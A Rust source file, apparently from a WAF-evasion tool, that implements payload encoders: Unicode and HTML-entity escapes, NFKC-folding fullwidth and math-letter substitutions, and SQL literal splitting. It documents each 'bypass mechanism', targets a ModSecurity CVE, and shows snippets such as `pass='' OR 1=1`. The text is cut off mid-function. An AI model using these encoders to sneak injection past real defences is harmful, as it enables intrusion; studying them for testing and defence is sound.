wafrift_encoding/encoding/unicode.rs
1//! Unicode and HTML entity encoding strategies.
2use std::fmt::Write as _;
3
/// Escapes every character of `payload` as a JSON/JavaScript `\uXXXX`
/// sequence.
///
/// Characters above U+FFFF are written as a UTF-16 surrogate pair, i.e.
/// two consecutive `\uXXXX` escapes, which is how JSON and JavaScript spell
/// supplementary-plane characters. Hex digits are uppercase and
/// zero-padded to four places.
///
/// **Context**: only meaningful when the target parser performs
/// JSON/JavaScript unescaping. On a raw HTTP parameter the server simply
/// receives the literal backslash-u text.
#[must_use]
pub fn unicode_encode(payload: &str) -> String {
    let mut encoded = String::with_capacity(payload.len() * 6);
    let mut units = [0u16; 2];
    for ch in payload.chars() {
        // `encode_utf16` yields a single unit for BMP characters and the
        // high/low surrogate pair for everything above U+FFFF.
        for unit in ch.encode_utf16(&mut units).iter() {
            let _ = write!(encoded, "\\u{unit:04X}");
        }
    }
    encoded
}
25
/// IIS/ASP-style percent-Unicode encoding: every UTF-16 code unit of
/// `payload` becomes `%uXXXX` (uppercase hex, four digits).
///
/// The `%u` form carries exactly four hex digits, so it can only express
/// BMP values. Characters above U+FFFF are therefore emitted as their
/// UTF-16 surrogate pair (U+1F600 becomes `%uD83D%uDE00`) rather than as a
/// single over-wide `%u1F600`.
///
/// **Context**: intended for IIS / classic-ASP parsers that decode `%u`
/// sequences.
#[must_use]
pub fn iis_unicode_encode(payload: &str) -> String {
    let mut encoded = String::with_capacity(payload.len() * 6);
    // Walking the string as UTF-16 gives one unit per BMP character and
    // the surrogate pair for supplementary-plane characters.
    for unit in payload.encode_utf16() {
        let _ = write!(encoded, "%u{unit:04X}");
    }
    encoded
}
51
/// JSON string-content escape: returns the escaped INTERIOR of a JSON
/// string literal, without surrounding `"` quotes.
///
/// Escapes applied:
/// - backslash and double quote get a leading backslash;
/// - backspace, form feed, newline, carriage return and tab use their
///   short forms (`\b`, `\f`, `\n`, `\r`, `\t`);
/// - any other character below U+0020 becomes `\u00XX` (uppercase hex);
/// - everything else is copied through unchanged.
///
/// No quotes are added because the result is meant to be substituted into
/// an EXISTING string field (e.g. the value of `{"q": "..."}`); wrapping
/// it again would produce malformed JSON. Callers that need a standalone
/// JSON string literal can add the quotes themselves.
///
/// **Context**: inject inside an existing JSON string field whose backend
/// parser unescapes the sequences.
#[must_use]
pub fn json_string_encode(payload: &str) -> String {
    let mut escaped = String::with_capacity(payload.len() * 2);
    for ch in payload.chars() {
        // Characters that have a dedicated two-character escape.
        let short_form = match ch {
            '\\' => Some("\\\\"),
            '"' => Some("\\\""),
            '\u{0008}' => Some("\\b"),
            '\u{000C}' => Some("\\f"),
            '\n' => Some("\\n"),
            '\r' => Some("\\r"),
            '\t' => Some("\\t"),
            _ => None,
        };
        if let Some(seq) = short_form {
            escaped.push_str(seq);
        } else if ch < '\u{20}' {
            // Remaining control characters must be written numerically.
            let _ = write!(escaped, "\\u{:04X}", u32::from(ch));
        } else {
            escaped.push(ch);
        }
    }
    escaped
}
91
/// HTML hexadecimal entity encoding: every character of `payload` becomes
/// `&#xHH;`, where `HH` is its code point in uppercase hex with no padding.
///
/// **Context**: only useful where the consumer decodes HTML character
/// references (e.g. a browser parsing HTML).
#[must_use]
pub fn html_entity_encode(payload: &str) -> String {
    payload
        .chars()
        .fold(String::with_capacity(payload.len() * 6), |mut acc, ch| {
            let _ = write!(acc, "&#x{:X};", u32::from(ch));
            acc
        })
}
103
/// HTML decimal entity encoding: every character of `payload` becomes
/// `&#DD;`, where `DD` is its code point in decimal with no padding.
///
/// **Context**: only useful where the consumer decodes HTML character
/// references (e.g. a browser parsing HTML).
#[must_use]
pub fn html_entity_decimal_encode(payload: &str) -> String {
    let mut encoded = String::with_capacity(payload.len() * 6);
    for code in payload.chars().map(u32::from) {
        let _ = write!(encoded, "&#{code};");
    }
    encoded
}
115
/// HTML numeric character references with zero-padded digits.
///
/// Every character of `payload` becomes `&#x<digits>;` (when `hex` is
/// true, uppercase hex) or `&#<digits>;` (decimal), with the digits
/// left-padded with `0` to at least `pad` characters. Code points that
/// already need more than `pad` digits are written in full, never
/// truncated.
///
/// # Parameters
/// - `pad`: minimum digit width. Clamped to `1..=16`, so `0` behaves like
///   `1` (no padding) and huge values cannot blow up the output size.
///   For `<`: hex width 4 gives `&#x003C;`, decimal width 6 gives
///   `&#000060;`.
/// - `hex`: `true` for the `&#x..;` form, `false` for the decimal form.
///
/// # Background
/// Targets **CVE-2025-27110** (libmodsecurity3 v3.0.13), where numeric
/// character references containing leading zeros reportedly skip the
/// entity-decoding pass, so rules anchored on the literal `<`, `'`, `"`
/// never see the decoded character; 3.0.14 is the fixed release. The
/// write-up recommends probing widths 4, 6 and 8 because parsers differ
/// in how many leading zeros they accept. Advisory:
/// <https://modsecurity.org/20250225/html-entity-decoding-regression-cve-2025-27110-2025-february/>.
///
/// Pass 21 R67 - frontier technique #6 per the 2025 research scan.
#[must_use]
pub fn html_entity_zero_pad(payload: &str, pad: usize, hex: bool) -> String {
    // Anti-DoS guard: an unbounded width would multiply the payload size by
    // the requested padding. Sixteen digits is already far beyond what any
    // parser is expected to tolerate.
    const MIN_WIDTH: usize = 1;
    const MAX_WIDTH: usize = 16;
    let width = pad.clamp(MIN_WIDTH, MAX_WIDTH);

    let mut encoded = String::with_capacity(payload.len() * (width + 4));
    for code in payload.chars().map(u32::from) {
        let _ = if hex {
            write!(encoded, "&#x{:0>width$X};", code, width = width)
        } else {
            write!(encoded, "&#{:0>width$};", code, width = width)
        };
    }
    encoded
}
163
/// HTML entity encoding with per-character variant rotation.
///
/// Each character is written as a numeric character reference, cycling by
/// character index through four spellings that browsers accept but that
/// strict WAF regexes (typically anchored on `&#x[0-9a-f]+;` with a
/// lowercase `x`) tend to miss:
///
/// 1. index % 4 == 0: `&#xhh;`  - lowercase `x`, lowercase hex
/// 2. index % 4 == 1: `&#XHH;`  - uppercase `X`, uppercase hex
/// 3. index % 4 == 2: `&#DD;`   - plain decimal
/// 4. index % 4 == 3: `&#00DD;` - decimal with two leading zeros
///
/// The rotation depends only on the character index, so the output is
/// deterministic for a given input.
///
/// **Example**: `<<s>` encodes to `&#x3c;&#X3C;&#115;&#0062;`. A rule
/// expecting every reference in the canonical lowercase-hex shape does not
/// match that mix, while an HTML parser decodes all four.
///
/// **Context**: HTML body / attribute values, wherever character
/// references are decoded.
#[must_use]
pub fn html_entity_variants(payload: &str) -> String {
    let mut out = String::with_capacity(payload.len() * 8);
    for (idx, ch) in payload.chars().enumerate() {
        let code = u32::from(ch);
        let _ = match idx % 4 {
            0 => write!(out, "&#x{code:x};"),
            1 => write!(out, "&#X{code:X};"),
            2 => write!(out, "&#{code};"),
            // Leading-zero decimal reference. This literal must start with
            // the ASCII text `&#00`; a U+FFFD character here yields output
            // that is not an entity at all.
            _ => write!(out, "&#00{code};"),
        };
    }
    out
}
210
/// Fullwidth Unicode encoding: swaps printable ASCII for its fullwidth
/// counterpart.
///
/// - `!` through `~` (U+0021..=U+007E) map to U+FF01..=U+FF5E, a constant
///   offset of 0xFEE0.
/// - A space (U+0020) maps to the ideographic space U+3000.
/// - Every other character is copied through unchanged.
///
/// **Bypass mechanism**: WAF rules that match ASCII keywords (`SELECT`,
/// `UNION`, `<script>`, ...) do not match the fullwidth code points, while
/// a backend that applies Unicode NFKC normalisation folds them back to
/// ASCII before use.
///
/// **Context**: targets whose backend normalises Unicode before parsing.
#[must_use]
pub fn fullwidth_encode(payload: &str) -> String {
    // Distance between an ASCII character and its fullwidth form
    // (U+FF01 - U+0021).
    const FULLWIDTH_OFFSET: u32 = 0xFEE0;

    let mut widened = String::with_capacity(payload.len() * 3);
    widened.extend(payload.chars().map(|ch| match ch {
        ' ' => '\u{3000}',
        '!'..='~' => char::from_u32(u32::from(ch) + FULLWIDTH_OFFSET).unwrap_or(ch),
        other => other,
    }));
    widened
}
240
/// Mathematical Alphanumeric Symbols (bold) encoding: replaces ASCII
/// letters and digits with their Math-Bold counterparts.
///
/// - `A`..=`Z` map to U+1D400..=U+1D419 (bold capitals)
/// - `a`..=`z` map to U+1D41A..=U+1D433 (bold small letters)
/// - `0`..=`9` map to U+1D7CE..=U+1D7D7 (bold digits)
/// - everything else (punctuation, whitespace, non-ASCII) is unchanged, so
///   the payload's syntactic skeleton stays intact.
///
/// **Bypass mechanism**: these code points NFKC-normalise back to plain
/// ASCII. A backend that normalises before parsing sees the original
/// keyword, while a WAF matching ASCII keywords sees only code points in
/// the U+1D400 block.
///
/// **Distinct from `fullwidth_encode`**: that function uses the U+FF00
/// Halfwidth-and-Fullwidth-Forms block; this one uses U+1D400, a
/// different range that a fullwidth-aware WAF may not cover.
///
/// **Context**: any target whose backend NFKC-normalises input before
/// parsing it.
#[must_use]
pub fn math_bold_encode(payload: &str) -> String {
    const BOLD_UPPER: u32 = 0x1D400;
    const BOLD_LOWER: u32 = 0x1D41A;
    const BOLD_DIGIT: u32 = 0x1D7CE;

    let mut styled = String::with_capacity(payload.len() * 4);
    for ch in payload.chars() {
        // Target code point, or `None` when the character is passed through.
        let target = if ch.is_ascii_uppercase() {
            Some(BOLD_UPPER + (u32::from(ch) - u32::from('A')))
        } else if ch.is_ascii_lowercase() {
            Some(BOLD_LOWER + (u32::from(ch) - u32::from('a')))
        } else if ch.is_ascii_digit() {
            Some(BOLD_DIGIT + (u32::from(ch) - u32::from('0')))
        } else {
            None
        };
        styled.push(target.and_then(char::from_u32).unwrap_or(ch));
    }
    styled
}
282
/// Mathematical Italic encoding: the same NFKC trick as
/// `math_bold_encode`, in a different part of the block.
///
/// - `A`..=`Z` map to U+1D434 onward
/// - `a`..=`z` map to U+1D44E onward, except `h`
/// - `h` maps to U+210E (PLANCK CONSTANT): the italic range has a hole at
///   U+1D455, where italic `h` would sit, because that letter is encoded
///   in the Letterlike Symbols block instead
/// - digits and everything else are unchanged
///
/// WAFs that detect the bold range do not always cover italic.
///
/// Reference: <https://ibrahimsql.com/posts/waf-bypass-unicode>
#[must_use]
pub fn math_italic_encode(payload: &str) -> String {
    /// Moves `ch` from the ASCII run starting at `first` to the run
    /// starting at code point `base`.
    fn relocate(ch: char, first: char, base: u32) -> char {
        char::from_u32(base + (u32::from(ch) - u32::from(first))).unwrap_or(ch)
    }

    let mut styled = String::with_capacity(payload.len() * 4);
    for ch in payload.chars() {
        styled.push(match ch {
            // Must precede the lowercase range: U+1D455 is unassigned.
            'h' => '\u{210E}',
            'A'..='Z' => relocate(ch, 'A', 0x1D434),
            'a'..='z' => relocate(ch, 'a', 0x1D44E),
            _ => ch,
        });
    }
    styled
}
308
/// Mathematical Script encoding: uppercase from U+1D49C, lowercase from
/// U+1D4B6.
///
/// The script range has eleven holes, letters that are encoded in the
/// Letterlike Symbols block instead. Those letters are substituted from
/// that block so every letter still has a script form:
///
/// | letter | substitute | letter | substitute |
/// |--------|------------|--------|------------|
/// | `B`    | U+212C     | `M`    | U+2133     |
/// | `E`    | U+2130     | `R`    | U+211B     |
/// | `F`    | U+2131     | `e`    | U+212F     |
/// | `H`    | U+210B     | `g`    | U+210A     |
/// | `I`    | U+2110     | `o`    | U+2134     |
/// | `L`    | U+2112     |        |            |
///
/// Digits and all non-letter characters are unchanged.
#[must_use]
pub fn math_script_encode(payload: &str) -> String {
    // Letters missing from the U+1D49C/U+1D4B6 runs and their
    // Letterlike-Symbols replacements.
    const LETTERLIKE: [(char, char); 11] = [
        ('B', '\u{212C}'),
        ('E', '\u{2130}'),
        ('F', '\u{2131}'),
        ('H', '\u{210B}'),
        ('I', '\u{2110}'),
        ('L', '\u{2112}'),
        ('M', '\u{2133}'),
        ('R', '\u{211B}'),
        ('e', '\u{212F}'),
        ('g', '\u{210A}'),
        ('o', '\u{2134}'),
    ];

    let mut styled = String::with_capacity(payload.len() * 4);
    for ch in payload.chars() {
        let substitute = LETTERLIKE
            .iter()
            .find(|(ascii, _)| *ascii == ch)
            .map(|&(_, sub)| sub);
        let mapped = substitute.unwrap_or_else(|| {
            let (first, base) = if ch.is_ascii_uppercase() {
                ('A', 0x1D49C_u32)
            } else if ch.is_ascii_lowercase() {
                ('a', 0x1D4B6_u32)
            } else {
                return ch;
            };
            char::from_u32(base + (u32::from(ch) - u32::from(first))).unwrap_or(ch)
        });
        styled.push(mapped);
    }
    styled
}
339
/// Mathematical Fraktur (blackletter) encoding: uppercase from U+1D504,
/// lowercase from U+1D51E.
///
/// The uppercase run has holes at `C`, `H`, `I`, `R` and `Z`; those
/// letters are substituted with U+212D, U+210C, U+2111, U+211C and U+2128
/// respectively. Digits and all non-letter characters are unchanged.
#[must_use]
pub fn math_fraktur_encode(payload: &str) -> String {
    let mut styled = String::with_capacity(payload.len() * 4);
    for ch in payload.chars() {
        let ascii = u32::from(ch);
        let code = match ch {
            // Holes first, so they shadow the generic uppercase range.
            'C' => 0x212D,
            'H' => 0x210C,
            'I' => 0x2111,
            'R' => 0x211C,
            'Z' => 0x2128,
            'A'..='Z' => 0x1D504 + (ascii - u32::from('A')),
            'a'..='z' => 0x1D51E + (ascii - u32::from('a')),
            _ => ascii,
        };
        styled.push(char::from_u32(code).unwrap_or(ch));
    }
    styled
}
361
/// Mathematical Double-Struck (blackboard bold) encoding: uppercase from
/// U+1D538, lowercase from U+1D552, digits from U+1D7D8.
///
/// The uppercase run has holes at `C`, `H`, `N`, `P`, `Q`, `R` and `Z`;
/// those letters are substituted with U+2102, U+210D, U+2115, U+2119,
/// U+211A, U+211D and U+2124 from the Letterlike Symbols block. All other
/// characters are unchanged.
#[must_use]
pub fn math_double_struck_encode(payload: &str) -> String {
    /// Double-struck form of one character (identity for non-alphanumerics).
    fn double_struck(ch: char) -> char {
        let shifted = |first: char, base: u32| {
            char::from_u32(base + (u32::from(ch) - u32::from(first))).unwrap_or(ch)
        };
        match ch {
            // Holes first, so they shadow the generic uppercase range.
            'C' => '\u{2102}',
            'H' => '\u{210D}',
            'N' => '\u{2115}',
            'P' => '\u{2119}',
            'Q' => '\u{211A}',
            'R' => '\u{211D}',
            'Z' => '\u{2124}',
            'A'..='Z' => shifted('A', 0x1D538),
            'a'..='z' => shifted('a', 0x1D552),
            '0'..='9' => shifted('0', 0x1D7D8),
            _ => ch,
        }
    }

    let mut styled = String::with_capacity(payload.len() * 4);
    styled.extend(payload.chars().map(double_struck));
    styled
}
387
/// Letterlike-symbols + circled-Latin substitution: replaces each ASCII
/// letter with a code point from U+2100..U+214F or U+24B6..U+24E9 that is
/// intended to NFKC-normalise back to the original letter.
///
/// Unlike the `math_*_encode` functions, which take every letter from one
/// block, this picks a dedicated letterlike symbol per letter where one is
/// listed below and falls back to the circled form otherwise:
///
/// - script capitals: `B` `E` `F` `H` `I` `L` `M`
/// - double-struck capitals: `C` `N` `P` `Q` `R` `Z`
/// - `K` uses U+212A (KELVIN SIGN)
/// - script small letters: `e` `g` `o`
/// - any other `A`..=`Z` maps to U+24B6 onward (circled capitals)
/// - any other `a`..=`z` maps to U+24D0 onward (circled small letters)
///
/// Digits, punctuation and non-ASCII characters are unchanged.
///
/// **Bypass mechanism**: a backend that NFKC-normalises sees the original
/// keyword (e.g. `SELECT`), while the WAF's signature regex sees an
/// unrelated code-point sequence.
#[must_use]
pub fn letterlike_encode(payload: &str) -> String {
    /// Dedicated Letterlike-Symbols substitute for `ch`, if one is used.
    fn letterlike(ch: char) -> Option<char> {
        let symbol = match ch {
            'B' => '\u{212C}', // SCRIPT CAPITAL B
            'C' => '\u{2102}', // DOUBLE-STRUCK CAPITAL C
            'E' => '\u{2130}', // SCRIPT CAPITAL E
            'F' => '\u{2131}', // SCRIPT CAPITAL F
            'H' => '\u{210B}', // SCRIPT CAPITAL H
            'I' => '\u{2110}', // SCRIPT CAPITAL I
            'K' => '\u{212A}', // KELVIN SIGN
            'L' => '\u{2112}', // SCRIPT CAPITAL L
            'M' => '\u{2133}', // SCRIPT CAPITAL M
            'N' => '\u{2115}', // DOUBLE-STRUCK CAPITAL N
            'P' => '\u{2119}', // DOUBLE-STRUCK CAPITAL P
            'Q' => '\u{211A}', // DOUBLE-STRUCK CAPITAL Q
            'R' => '\u{211D}', // DOUBLE-STRUCK CAPITAL R
            'Z' => '\u{2124}', // DOUBLE-STRUCK CAPITAL Z
            'e' => '\u{212F}', // SCRIPT SMALL E
            'g' => '\u{210A}', // SCRIPT SMALL G
            'o' => '\u{2134}', // SCRIPT SMALL O
            _ => return None,
        };
        Some(symbol)
    }

    /// Circled-Latin fallback for letters without a dedicated substitute.
    fn circled(ch: char) -> char {
        let code = match ch {
            'A'..='Z' => 0x24B6 + (u32::from(ch) - u32::from('A')),
            'a'..='z' => 0x24D0 + (u32::from(ch) - u32::from('a')),
            _ => return ch,
        };
        char::from_u32(code).unwrap_or(ch)
    }

    let mut out = String::with_capacity(payload.len() * 4);
    out.extend(
        payload
            .chars()
            .map(|ch| letterlike(ch).unwrap_or_else(|| circled(ch))),
    );
    out
}
435
/// SQL string-literal CONCAT splitter: rewrites every single-quoted string
/// literal in `payload` as `CONCAT('a','b',...)` with one character per
/// argument.
///
/// Input `'admin'` becomes `CONCAT('a','d','m','i','n')`.
///
/// **Bypass mechanism**: blocklists that look for literal danger strings
/// (`'admin'`, `'password'`, `'/etc/passwd'`, ...) find only
/// one-character literals; the database evaluates `CONCAT(...)` back to
/// the original string at runtime.
///
/// Variadic `CONCAT` is available in MySQL, MariaDB, PostgreSQL and MSSQL.
/// Oracle's `CONCAT` is binary-only and is out of scope here; the `||`
/// operator form is a separate tamper.
///
/// **Edge cases**:
/// - Empty literal (`''`) becomes `CONCAT('')`.
/// - A doubled quote inside a literal (`'O''Brien'`) is the SQL-standard
///   escape for one quote character. It is kept inside the literal and
///   emitted as its own argument `''''`, so the result stays valid SQL:
///   `CONCAT('O','''','B','r','i','e','n')`.
/// - Backslash escapes are NOT interpreted: in `'O\'Brien'` the quote
///   after the backslash closes the literal.
/// - An opening quote with no closing quote: the remainder of the payload
///   is copied through verbatim.
/// - Text outside single quotes (including double-quoted identifiers) is
///   left alone.
///
/// **Context**: SQL injection payloads that contain string literals.
#[must_use]
pub fn sql_concat_split(payload: &str) -> String {
    let mut out = String::with_capacity(payload.len() * 4);
    let mut chars = payload.char_indices().peekable();
    while let Some((start, ch)) = chars.next() {
        if ch != '\'' {
            out.push(ch);
            continue;
        }
        // Opening quote found: collect the unescaped literal body.
        let mut literal = String::new();
        let mut closed = false;
        while let Some((_, next)) = chars.next() {
            if next != '\'' {
                literal.push(next);
                continue;
            }
            // `''` inside a literal is one escaped quote, not a terminator.
            if chars.next_if(|&(_, c)| c == '\'').is_some() {
                literal.push('\'');
                continue;
            }
            closed = true;
            break;
        }
        if !closed {
            // Unbalanced quote: the scan ran to the end of the payload, so
            // copy everything from the opener onward exactly as written.
            out.push_str(&payload[start..]);
            break;
        }
        out.push_str("CONCAT(");
        if literal.is_empty() {
            out.push_str("''");
        } else {
            // Written straight into `out`; no per-argument allocations.
            for (idx, c) in literal.chars().enumerate() {
                if idx > 0 {
                    out.push(',');
                }
                if c == '\'' {
                    // A one-character literal holding a quote is `''''`.
                    out.push_str("''''");
                } else {
                    out.push('\'');
                    out.push(c);
                    out.push('\'');
                }
            }
        }
        out.push(')');
    }
    out
}
516
/// SQL `CHAR()` decomposition: rewrites every single-quoted string literal
/// in `payload` as `CHAR(N1,N2,...)` with one decimal code point per
/// argument.
///
/// Input `'admin'` becomes `CHAR(97,100,109,105,110)`.
///
/// **Bypass mechanism**: unlike `sql_concat_split`, the result contains no
/// quoted tokens at all, so rules matching string-literal patterns or
/// `CONCAT(...)` shapes both miss it.
///
/// Variadic `CHAR()` is native to MySQL/MariaDB and also exists in MSSQL.
/// For Postgres / Oracle the equivalent is `CHR()`, which this function
/// does not produce.
///
/// **Edge cases**:
/// - Empty literal (`''`) is emitted unchanged as `''`. `CHAR()` with no
///   arguments evaluates to NULL in MySQL, which would turn
///   `pass='' OR 1=1` into a comparison against NULL.
/// - A doubled quote inside a literal (`'O''Brien'`) is the SQL-standard
///   escape for one quote character; it becomes the single argument `39`
///   instead of splitting the literal in two.
/// - Backslash escapes are not interpreted.
/// - Non-ASCII characters are emitted as their Unicode code point. For
///   values above 255 MySQL's `CHAR()` works per byte, so such characters
///   may not round-trip exactly.
/// - An opening quote with no closing quote: the remainder of the payload
///   is copied through verbatim.
///
/// **Context**: SQL injection with blocklisted string-literal targets
/// (`admin`, `password`, paths, hostnames).
#[must_use]
pub fn sql_char_decompose(payload: &str) -> String {
    let mut out = String::with_capacity(payload.len() * 5);
    let mut chars = payload.char_indices().peekable();
    while let Some((start, ch)) = chars.next() {
        if ch != '\'' {
            out.push(ch);
            continue;
        }
        // Opening quote found: collect the unescaped literal body.
        let mut literal = String::new();
        let mut closed = false;
        while let Some((_, next)) = chars.next() {
            if next != '\'' {
                literal.push(next);
                continue;
            }
            // `''` inside a literal is one escaped quote, not a terminator.
            if chars.next_if(|&(_, c)| c == '\'').is_some() {
                literal.push('\'');
                continue;
            }
            closed = true;
            break;
        }
        if !closed {
            // Unbalanced quote: the scan ran to the end of the payload, so
            // copy everything from the opener onward exactly as written.
            out.push_str(&payload[start..]);
            break;
        }
        if literal.is_empty() {
            // Keep the empty string as-is: `CHAR()` would be NULL in MySQL.
            out.push_str("''");
            continue;
        }
        out.push_str("CHAR(");
        for (idx, c) in literal.chars().enumerate() {
            if idx > 0 {
                out.push(',');
            }
            let _ = write!(out, "{}", u32::from(c));
        }
        out.push(')');
    }
    out
}
599
/// Postgres / Oracle `CHR()` decomposition: rewrites every single-quoted
/// string literal in `payload` as a parenthesised chain
/// `(CHR(N)||CHR(N)||...)`, one call per character.
///
/// Input `'admin'` becomes
/// `(CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))`.
///
/// Differs from `sql_char_decompose`, which emits MySQL's variadic
/// `CHAR(N1,N2,...)`: `CHR()` takes a single argument, so the pieces are
/// joined with the `||` concatenation operator. The surrounding
/// parentheses keep precedence intact inside larger expressions.
///
/// Postgres accepts code points up to U+10FFFF; Oracle's `CHR(N)` depends
/// on the database character set. For ASCII payloads both behave the same.
///
/// **Edge cases**:
/// - Empty literal (`''`) becomes `('')`.
/// - A doubled quote inside a literal (`'it''s'`) is the SQL-standard
///   escape for one quote character; it becomes `CHR(39)` instead of
///   splitting the literal in two.
/// - Backslash escapes are not interpreted.
/// - An opening quote with no closing quote: the remainder of the payload
///   is copied through verbatim.
#[must_use]
pub fn pg_chr_decompose(payload: &str) -> String {
    let mut out = String::with_capacity(payload.len() * 7);
    let mut chars = payload.char_indices().peekable();
    while let Some((start, ch)) = chars.next() {
        if ch != '\'' {
            out.push(ch);
            continue;
        }
        // Opening quote found: collect the unescaped literal body.
        let mut literal = String::new();
        let mut closed = false;
        while let Some((_, next)) = chars.next() {
            if next != '\'' {
                literal.push(next);
                continue;
            }
            // `''` inside a literal is one escaped quote, not a terminator.
            if chars.next_if(|&(_, c)| c == '\'').is_some() {
                literal.push('\'');
                continue;
            }
            closed = true;
            break;
        }
        if !closed {
            // Unbalanced quote: the scan ran to the end of the payload, so
            // copy everything from the opener onward exactly as written.
            out.push_str(&payload[start..]);
            break;
        }
        if literal.is_empty() {
            out.push_str("('')");
            continue;
        }
        out.push('(');
        for (idx, c) in literal.chars().enumerate() {
            if idx > 0 {
                out.push_str("||");
            }
            let _ = write!(out, "CHR({})", u32::from(c));
        }
        out.push(')');
    }
    out
}
658
/// Partial JSON Unicode escape: rewrites ASCII letters and digits as
/// `\uXXXX` (uppercase hex) and leaves every other character (quotes,
/// operators, whitespace, non-ASCII text) untouched.
///
/// **Bypass mechanism**: keyword rules (UNION, SELECT, alert, script, ...)
/// match the raw byte sequence. Once each letter is an escape, the wire
/// bytes no longer contain the keyword, yet a JSON parser or JS engine at
/// the origin rebuilds it. Unlike [`unicode_encode`], which escapes every
/// character, this keeps the structural punctuation visible.
///
/// **Idempotent**: an existing `\uXXXX` sequence (backslash, `u`, four hex
/// digits) is copied through verbatim, so a second pass does not
/// re-escape already-escaped characters.
///
/// **Context**: only meaningful when the target parser performs
/// JSON/JavaScript-style Unicode unescaping. Against raw HTTP parameters
/// the literal backslash-u text is sent.
#[must_use]
pub fn json_unicode_alnum(payload: &str) -> String {
    /// True when `bytes` begins with a six-byte `\uXXXX` escape.
    fn starts_with_escape(bytes: &[u8]) -> bool {
        matches!(
            bytes,
            [b'\\', b'u', a, b, c, d, ..]
                if a.is_ascii_hexdigit()
                    && b.is_ascii_hexdigit()
                    && c.is_ascii_hexdigit()
                    && d.is_ascii_hexdigit()
        )
    }

    let mut out = String::with_capacity(payload.len() * 6);
    // Unprocessed tail of the payload; always starts on a char boundary.
    let mut rest = payload;
    while let Some(c) = rest.chars().next() {
        if starts_with_escape(rest.as_bytes()) {
            // All six bytes are ASCII, so splitting at 6 is a valid
            // boundary and skips exactly six characters.
            let (escape, tail) = rest.split_at(6);
            out.push_str(escape);
            rest = tail;
            continue;
        }
        if c.is_ascii_alphanumeric() {
            let _ = write!(out, "\\u{:04X}", u32::from(c));
        } else {
            out.push(c);
        }
        rest = &rest[c.len_utf8()..];
    }
    out
}
728
/// Full JSON `\uXXXX` escape: escapes EVERY character of the input,
/// including punctuation, whitespace and control characters.
///
/// Stronger than `json_unicode_alnum`, which only touches ASCII letters
/// and digits. Useful when the WAF tokenises on punctuation that the
/// partial form leaves intact, or matches the keyword together with its
/// adjacent punctuation. Characters above U+FFFF are written as a UTF-16
/// surrogate pair. Hex digits are uppercase.
///
/// **Idempotent** on already-escaped input: an existing `\uXXXX` sequence
/// (backslash, `u`, four hex digits) is copied through verbatim.
#[must_use]
pub fn json_unicode_full(payload: &str) -> String {
    let mut out = String::with_capacity(payload.len() * 6);
    let raw = payload.as_bytes();
    let mut cursor = payload.char_indices();
    let mut units = [0u16; 2];
    while let Some((start, ch)) = cursor.next() {
        // Look at the five bytes after a backslash: `u` plus four hex
        // digits means an escape that is already in place.
        let already_escaped = ch == '\\'
            && matches!(
                raw.get(start + 1..start + 6),
                Some([b'u', digits @ ..]) if digits.iter().all(u8::is_ascii_hexdigit)
            );
        if already_escaped {
            out.push_str(&payload[start..start + 6]);
            // Skip the escape's remaining five characters (all ASCII).
            let _ = cursor.nth(4);
            continue;
        }
        // One unit for BMP characters, a surrogate pair otherwise.
        for unit in ch.encode_utf16(&mut units).iter() {
            let _ = write!(out, "\\u{unit:04X}");
        }
    }
    out
}
774
/// Mixed-case JSON `\uXXXX` escape: every character is escaped, rotating
/// by character index between `\u` / `\U` prefixes and lower / upper case
/// hex digits.
///
/// Some WAF regexes are case-sensitive against one spelling of the escape.
/// RFC 8259 only defines the lowercase `\u` prefix, so this is only useful
/// against backends whose decoder is more lenient than the WAF's pattern.
///
/// Rotation for BMP characters, by `index % 4`:
///
/// | index % 4 | prefix | hex digits |
/// |-----------|--------|------------|
/// | 0         | `\u`   | lowercase  |
/// | 1         | `\U`   | uppercase  |
/// | 2         | `\u`   | uppercase  |
/// | 3         | `\U`   | lowercase  |
///
/// Characters above U+FFFF become a surrogate pair whose two halves use
/// opposite styles: even index gives lowercase `\u` + uppercase `\U`, odd
/// index gives uppercase `\U` + lowercase `\u`.
#[must_use]
pub fn json_unicode_mixed_case(payload: &str) -> String {
    let mut out = String::with_capacity(payload.len() * 6);
    for (idx, ch) in payload.chars().enumerate() {
        let code = u32::from(ch);
        // `checked_sub` succeeds exactly for code points above U+FFFF.
        let _ = if let Some(offset) = code.checked_sub(0x1_0000) {
            let hi = 0xD800 + (offset >> 10);
            let lo = 0xDC00 + (offset & 0x3FF);
            if idx % 2 == 0 {
                write!(out, "\\u{hi:04x}\\U{lo:04X}")
            } else {
                write!(out, "\\U{hi:04X}\\u{lo:04x}")
            }
        } else {
            match idx % 4 {
                0 => write!(out, "\\u{code:04x}"),
                1 => write!(out, "\\U{code:04X}"),
                2 => write!(out, "\\u{code:04X}"),
                _ => write!(out, "\\U{code:04x}"),
            }
        };
    }
    out
}
809
/// SQL adjacent-string-literal concatenation — every `'string'` literal of
/// length ≥ 2 is rewritten as a sequence of single-character adjacent
/// literals: `'admin'` → `'a' 'd' 'm' 'i' 'n'`.
///
/// **Bypass mechanism**: SQL standard (ANSI SQL-92 §5.3) specifies that
/// two adjacent character-string literals separated only by whitespace
/// are concatenated by the parser. MySQL, Postgres, SQLite, Oracle, DB2
/// all implement this. WAF rules that match the literal substring of
/// well-known credentials or paths (e.g. `'admin'`, `'/etc/passwd'`)
/// see N unrelated single-character strings instead of one token. The
/// database rejoins them at parse time — no comments, no CONCAT calls,
/// no special functions. Pure SQL semantics.
///
/// **Idempotent**: every output sub-literal has length 1, below the
/// split threshold — a second pass leaves the output unchanged.
///
/// **Context**: Effective against any byte-pattern WAF inspecting
/// SQL bodies. Inert outside SQL context (won't fire on non-quoted
/// payloads).
829#[must_use]
830pub fn sql_adjacent_string_concat(payload: &str) -> String {
831 let mut out = String::with_capacity(payload.len() + 8);
832 let mut chars = payload.chars().peekable();
833 while let Some(ch) = chars.next() {
834 if ch != '\'' {
835 out.push(ch);
836 continue;
837 }
838 let mut literal = String::new();
839 let mut closed = false;
840 while let Some(&next) = chars.peek() {
841 chars.next();
842 if next == '\'' {
843 if chars.peek() == Some(&'\'') {
844 literal.push('\'');
845 chars.next();
846 continue;
847 }
848 closed = true;
849 break;
850 }
851 literal.push(next);
852 }
853 if !closed {
854 out.push('\'');
855 out.push_str(&literal);
856 continue;
857 }
858 let lit_chars: Vec<char> = literal.chars().collect();
859 if lit_chars.len() < 2 {
860 // Length-0 or length-1 literal: pass through. Note for
861 // length-1 with `'`: that's a literal containing a single
862 // `'`, which we encode as `''''` (four-quote form) to keep
863 // the output SQL-valid.
864 out.push('\'');
865 if lit_chars.len() == 1 && lit_chars[0] == '\'' {
